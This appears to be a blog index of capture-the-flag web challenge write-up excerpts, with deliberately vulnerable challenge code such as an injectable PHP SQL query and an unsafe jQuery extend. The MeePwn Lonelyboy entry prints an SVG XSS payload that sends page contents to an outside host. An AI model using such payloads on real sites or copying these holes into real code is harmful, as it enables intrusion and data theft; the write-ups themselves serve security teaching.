Faust CTF 22 - AdminCrashBoard

RCE-As-A-Service (RAAS)

This challenge was a web app with ports 5000 and 22 open. On port 5000 runs a web app called AdminCrashBoard, written in Flask. User management is done with PAM, so registering a user creates a Linux user on the system. SSH is running on port 22. The web app allows registered and logged-in users to upload so-called buttons that can be executed on the server. Example button: ...

29 Jul. 2022 · kunte_

Hacklu 2019 - Car Repair Shop

Description

Your car broke down?! Come to our shop, we repair all cars! Even very old ones.

Enter the Shop · Challenge Source · New GitHub demo

Solution

Car Repair Shop is a classic XSS challenge I created for the Hack.lu 2019 CTF. Looking at the static HTML code, you find jQuery and two custom scripts. One defines a Car class:

```javascript
class Car {
    constructor(type, model, color, pic, key="") {
        this.type = type
        this.model = model
        this.color = color
        this.key = key
        this.pic = pic
        let started = false
        this.start = () => { started = true }
        this.isStarted = () => { return started }
    }

    powerOn() {
        if (this.isStarted()) {
            infobox(`Well Done!`)
            nextCar()
        } else {
            $('.chargeup')[0].play()
        }
    }

    info() {
        infobox(`This car is a ${this.type} ${this.model} in ${this.color}. It looks very nice! But it seems to be broken ...`)
    }

    repair() {
        if(urlParams.has('repair')) {
            $.extend(true, this, JSON.parse(urlParams.get('repair')))
        }
    }

    light() {
        infobox(`You turn on the lights ... Nothing happens.`)
    }

    battery() {
        infobox(`Hmmm, the battery is almost empty ... Maybe i can repair this somehow.`)
    }

    ignition() {
        if (this.key == "") {
            infobox(`Looks like the key got lost. No wonder the car is not starting ...`)
        }
        if (this.key == "🔑") {
            infobox(`The car started!`)
            this.start()
        }
    }
}
```

In the challenge, you are supposed to fix the cars and, in the end, get JavaScript execution. After analyzing the code, you find that you can call jQuery extend with your input. The jQuery version used in this challenge is still vulnerable to Prototype Pollution. With it, you can set the key and bypass the MD5 check for the second car: toString will return lol because the object inherits from the Array class now and toString returns the value of the first element. ...

24 Oct. 2019 · kunte_

Ctfzone 2018 - Piggy Bank

Description

Piggy-Bank · CTFZONE 2018 Web Challenge [100]
Hack some bank for me. http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/

This is just a quick and dirty write-up. First, we created an account, logged in, and looked for interesting stuff. There was a VIP section: “This section is available only to privileged pigs with money in pockets. Transfer to the piggy-bank 1 000 000 coins and become important.” So we assumed this is what we had to do. For that, we needed more money, so we assumed that there was a bug in the transfer page. ...

22 Jul. 2018 · kunte_

Seccon 2017 - automatic_door

Description

automatic_door · Seccon2017 [500]
Get shell, and execute /flag_x
http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95/

Code

```php
<?php
$fail = str_repeat('fail', 100);
$d = 'sandbox/FAIL_' . sha1($_SERVER['REMOTE_ADDR'] . '95aca804b832f4c329d8c0e7c789b02b') . '/';
@mkdir($d);

function read_ok($f) {
    return strstr($f, 'FAIL_') === FALSE && strstr($f, '/proc/') === FALSE && strstr($f, '/dev/') === FALSE;
}

function write_ok($f) {
    return strstr($f, '..') === FALSE && read_ok($f);
}

function GetDirectorySize($path) {
    $bytestotal = 0;
    $path = realpath($path);
    if ($path !== false && $path != '' && file_exists($path)) {
        foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS)) as $object) {
            $bytestotal += $object->getSize();
        }
    }
    return $bytestotal;
}

if (isset($_GET['action'])) {
    if ($_GET['action'] == 'pwd') {
        echo $d;
        exit;
    } else if ($_GET['action'] == 'phpinfo') {
        phpinfo();
        exit;
    } else if ($_GET['action'] == 'read') {
        $f = $_GET['filename'];
        if (read_ok($f))
            echo file_get_contents($d . $f);
        else
            echo $fail;
        exit;
    } else if ($_GET['action'] == 'write') {
        $f = $_GET['filename'];
        if (write_ok($f) && strstr($f, 'ph') === FALSE && $_FILES['file']['size'] < 10000) {
            print_r($_FILES['file']);
            print_r(move_uploaded_file($_FILES['file']['tmp_name'], $d . $f));
        } else
            echo $fail;
        if (GetDirectorySize($d) > 10000) {
            rmdir($d);
        }
        exit;
    } else if ($_GET['action'] == 'delete') {
        $f = $_GET['filename'];
        if (write_ok($f))
            print_r(unlink($d . $f));
        else
            echo $fail;
        exit;
    }
}
highlight_file(__FILE__);
```

Solution

First, we see that there are different actions (pwd, phpinfo, read, write and delete). I checked the phpinfo page first to get some more information. ...

10 Dec. 2017 · kunte_

MeePwn 2017 - Lonelyboy

Very quick little write-up: Get a friend account using XSS in SVG:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    var xhr = new XMLHttpRequest();
    xhr.open('GET','/home.php?email_address_of_tsu_friend=m@m.de');
    xhr.onload = function () {
      var myImage = new Image(100, 200);
      myImage.src ='http://example.com:81/'+btoa(xhr.responseText);
    };
    xhr.send(null);
  </script>
</svg>
```

Now you can upload a small file (20 characters) without any blacklisted keywords (system, exec, `, …) or blacklisted endings (php, .ht*, …). We noticed the header X-Powered-By: PHP-fpm/5.6, so we uploaded a .user.ini file. This is a configuration INI file that works on a per-directory basis. ...

23 Jul. 2017 · kunte_

Ctfzone 2017 - Timehackers

On the contacts page, we were able to send links to the admin bot, which it would then visit, and we assumed we had to steal credentials to get into the admin.php page. After we were unable to steal any cookies or find XSS on the site, we used nmap to scan the host. It showed that both 80 and 8080 were open; later a hint was released that there was a difference between them. ...

18 Jul. 2017 · kunte_

MeePwn 2017 - Br0kenMySQL

This was a three-stage SQLi challenge we solved during the MeePwn CTF. Shout-out to Sceptic, who solved the first stage and told me to look at the next one.

Br0kenMySQL · 100 pts · BabeTrick

```php
<title>Br0kenMySQL</title><h1><pre>
<p style='color:Red'>Br0kenMySQL</p>
<?php
if($_GET['debug']=='🕵') die(highlight_file(__FILE__));
require 'config.php';
$link = mysqli_connect('localhost', MYSQL_USER, MYSQL_PASSWORD);
if (!$link) {
    die('Could not connect: ' . mysql_error());
}
if (!mysqli_select_db($link,MYSQL_USER)) {
    die('Could not select database: ' . mysql_error());
}
$id = $_GET['id'];
if(preg_match('#sleep|benchmark|floor|rand|count#is',$id)) die('Don\'t hurt me :-(');
$query = mysqli_query($link,"SELECT username FROM users WHERE id = ". $id);
$row = mysqli_fetch_array($query);
$username = $row['username'];
if($username === 'guest'){
    $ip = @$_SERVER['HTTP_X_FORWARDED_FOR']!="" ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];
    if(preg_match('#sleep|benchmark|floor|rand|count#is',$ip)) die('Don\'t hurt me :-(');
    var_dump($ip);
    if(!empty($ip)) mysqli_query($link,"INSERT INTO logs VALUES('{$ip}')");
    $query = mysqli_query($link,"SELECT username FROM users WHERE id = ". $id);
    $row = mysqli_fetch_array($query);
    $username = $row['username'];
    if($username === 'admin'){
        echo "What ???????\nLogin as guest&admin at the same time ?\nSeems our code is broken, here is your bounty\n";
        die(FLAG);
    }
    echo "Nothing here";
} else {
    echo "Hello ".$username;
}
?>
```

As you can see, we want the first query to return guest and the second query to return admin. The admin ID was 1 and the guest ID was 2, and between the queries there was another injection point in an INSERT query. For all injections we had to bypass the following filter: ...

18 Jul. 2017 · kunte_

Hacklu 2015 - Prof. M. Eista Hax

Challenge description: Professor M. Eista Hax uses a digital tool to manage all his students. He is very happy with the system, but it does have one drawback: it does not support multiple users. This is a problem, because M. Eista Hax has employees who need access as well. To solve this he writes a super modern, highly encrypted web application to share the password with authorized users. Problem solved. ...

22 Oct. 2015 · kunte_